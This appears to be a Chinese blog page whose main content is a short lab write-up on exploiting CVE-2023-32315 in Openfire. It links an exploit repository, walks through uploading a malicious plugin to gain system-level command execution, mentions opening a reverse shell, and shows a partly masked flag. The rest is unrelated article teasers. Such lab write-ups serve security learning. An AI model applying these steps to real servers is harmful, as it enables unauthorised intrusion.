GitHub - miko550/CVE-2023-32315: Openfire Console Authentication Bypass Vulnerability with RCE pluginOpenfire Console Authentication Bypass Vulnerability with RCE plugin - miko550/CVE-2023-32315icon-default.png?t=N7T8https://github.com/miko550/CVE-2023-32315

我们只需要jar包上传即可!

这个pass123标志就是我们上传的!

get root
要想RCE,我们需要点击左上角的 server - Server Settings - Management Tool  左下角的“管理工具”→然后在管理员密码中输入“123”。

此时已经具有system权限!
      

点击编辑即可查看root.txt,也可以进行反弹shell,再拿一个shell!

fc0f128f6474ce***701435c7dec6c84


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/462400.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Docker----Dockerfile构建微服务镜像

目录 一、关键步骤 二、具体步骤 1、准备后端jar包(这里以java后端演示) 2、编写Dockerfile 3、构建镜像 4、运行镜像容器 5、测试是否成功 一、关键步骤 1、准备后端jar包(这里以java后端演示) 2、编写Dockerfile 3、构建镜像 4、运行镜像容器 5、测试是否成功 二…

Openfeign使用教程(带你快速体验Openfeign的便捷)

文章摘要 本文中将教会您如何快速使用Openfeign&#xff0c;包括Opengfeign的基础配置、接口调用、接口重试、拦截器实现、记录接口日志信息到数据库 文章目录 文章摘要一、Openfeign初步定义二、Openfeign快速入门1.引入maven坐标2.启动类增加EnableFeignClients注解3.定义fei…

从金蝶云星空到钉钉通过接口配置打通数据

从金蝶云星空到钉钉通过接口配置打通数据 对接系统金蝶云星空 金蝶K/3Cloud&#xff08;金蝶云星空&#xff09;是移动互联网时代的新型ERP&#xff0c;是基于WEB2.0与云技术的新时代企业管理服务平台。金蝶K/3Cloud围绕着“生态、人人、体验”&#xff0c;旨在帮助企业打造面…

IDEA连接Mysql失败:下载驱动失败,Failed todownload Cannot download Read timed out

解决&#xff1a; 1. 手动加入jar包 2.选择自己maven仓库中存在mysql-connector 3. 选择完毕后&#xff0c;确定使用&#xff1a; 4. 进行测试连接

【代码随想录】【回溯算法】补day24:组合问题以及组合的优化

回溯算法&#xff1a;递归函数里面嵌套着for循环 给定两个整数 n 和 k&#xff0c;返回 1 … n 中所有可能的 k 个数的组合。 示例: 输入: n 4, k 2 输出: [ [2,4], [3,4], [2,3], [1,2], [1,3], [1,4], ] 包含组合问题和组合问题的剪枝优化 class solution:def combine(se…

免费接口调用 招标信息自动抽取|招标信息|招标数据解析接口

一、开源项目介绍 一款多模态AI能力引擎&#xff0c;专注于提供自然语言处理&#xff08;NLP&#xff09;、情感分析、实体识别、图像识别与分类、OCR识别和语音识别等接口服务。该平台功能强大&#xff0c;支持本地化部署&#xff0c;并鼓励用户体验和开发者共同完善&#xf…

git:码云仓库提交以及Spring项目创建

git&#xff1a;码云仓库提交 1 前言 码云访问稳定性优于github&#xff0c;首先准备好码云的账户&#xff1a; 官网下载GIT&#xff0c;打开git bash&#xff1a; 查看当前用户的所有GIT仓库&#xff0c;需要查看全局的配置信息&#xff0c;使用如下命令&#xff1a; git …

旅游管理系统 |基于springboot框架+ Mysql+Java+Tomcat的旅游管理系统设计与实现(可运行源码+数据库+设计文档)

推荐阅读100套最新项目 最新ssmjava项目文档视频演示可运行源码分享 最新jspjava项目文档视频演示可运行源码分享 最新Spring Boot项目文档视频演示可运行源码分享 目录 前台功能效果图 管理员功能登录前台功能效果图 系统功能设计 数据库E-R图设计 lunwen参考 摘要 研究…

羊大师分析羊奶入菜,美味新体验

羊大师分析羊奶入菜&#xff0c;美味新体验 羊奶&#xff0c;这一古老而珍贵的食材&#xff0c;近年来在料理界掀起了一股新风潮。其醇厚的口感和丰富的营养价值&#xff0c;让越来越多的人开始尝试将羊奶融入日常烹饪中&#xff0c;为味蕾带来前所未有的新体验。 在传统的烹饪…

由浅到深认识C语言(5):函数

该文章Github地址&#xff1a;https://github.com/AntonyCheng/c-notes 在此介绍一下作者开源的SpringBoot项目初始化模板&#xff08;Github仓库地址&#xff1a;https://github.com/AntonyCheng/spring-boot-init-template & CSDN文章地址&#xff1a;https://blog.csdn…

湖南麒麟SSH服务漏洞

针对湖南麒麟操作系统进行漏洞检测时&#xff0c;会报SSH漏洞风险提醒&#xff0c;具体如下&#xff1a; 针对这些漏洞&#xff0c;可以关闭SSH服务&#xff08;前提是应用已经部署完毕不再需要通过SSH远程访问传输文件的情况下&#xff0c;此时可以通过VNC远程登录方法&#x…

Arduino IDE配置ESP8266开发环境

一、配置步骤 在Arduino IDE中配置ESP8266开发环境的详细步骤如下&#xff1a; 1.打开Arduino IDE&#xff0c;依次点击“文件”->“首选项”&#xff0c;在“附加开发板管理器网址”一栏添加ESP8266开发板的网址。常用的网址是&#xff1a; http://arduino.esp8266.com/s…

软件测试——接口常见问题汇总

前言 今天我们来聊聊接口设计用例设计&#xff0c;说到这个接口&#xff0c;相信绝大多数的测试员都有遇到过某些棘手的问题&#xff0c;那么今天我们就来总结一下在接口方面会遇到的难题。 一、接口用例设计 接口测试用例可以从功能、性能、安全三方面进行入手&#xff0c;…

【好书推荐-第十二期】《并行计算与高性能计算》

&#x1f60e; 作者介绍&#xff1a;我是程序员洲洲&#xff0c;一个热爱写作的非著名程序员。CSDN全栈优质领域创作者、华为云博客社区云享专家、阿里云博客社区专家博主、前后端开发、人工智能研究生。公众号&#xff1a;洲与AI。 &#x1f388; 本文专栏&#xff1a;本文收录…

[java基础揉碎]多态参数

多态参数 方法定义的形参类型为父类类型&#xff0c;实参类型允许为子类类型 例子: 定义一个员工类, 有名字和工资两个属性, 有年工资的方法 定义一个普通员工继承了员工类 , 重写了年工资的方法 定义一个经理类, 也继承了员工类, 同时经理多以了一个奖金的属性, 重写的年…

GPD<论文精简版>

问题陈述 给定点云数据、机械手的几何参数&#xff0c;抓取位姿检测问题&#xff08; grasp pose detection problem&#xff09;表示为&#xff0c;在抓手闭合情况下&#xff0c;识别抓手的配置的问题。 &#xff1a;机器人工作空间 &#xff1a;三维点云中的一组点&#x…

宠物疾病 与 光线疗法

人类与动物以及大自然是相辅相成的。人离开动物将无法生存&#xff0c;对于动物我们尽力去保护&#xff0c;与大自然和谐稳定生存发展。 生息在地球上的所有动物、在自然太阳光奇妙的作用下、生长发育。太阳光的能量使它们不断进化、繁衍种族。现在、生物能够生存、全仰仗于太…

windbg调试协议wireshark抓包解析插件

把目录下文件复制到如下位置,Wireshark支持版本4.0以上 C:\Program Files\Wireshark\plugins\4.0\kdnet.lua C:\Program Files\Wireshark\gcrypt.dll C:\Program Files\Wireshark\luagcrypt.dll 启动 “C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe” -k …

如何检测无源晶振过驱?晶振过驱怎么办?

无源晶振(Passive Crystal Oscillator)是一种使用晶体元件来生成稳定频率的振荡器&#xff0c;它不像有源振荡器(如时钟芯片)那样需要外部电源。检测无源晶振是否过驱通常需要通过测量其输出波形和频率&#xff0c;与期望的规格进行比较。 如何检测无源晶振过驱&#xff1a; …

Java高级互联网架构师之路:排查当前JVM错误的步骤

程序 这个程序是有问题的,我们通过一些命令来分析这个程序究竟是哪里出了问题。首先把当前的程序通过SSH工具传输到centos系统中,之后我们就可以在linux环境下编译和执行。 注意一点:上面类的名字是Z,但是在linux环境下,我们将其改为了AA,并且文件名改为了AA,所以文章下…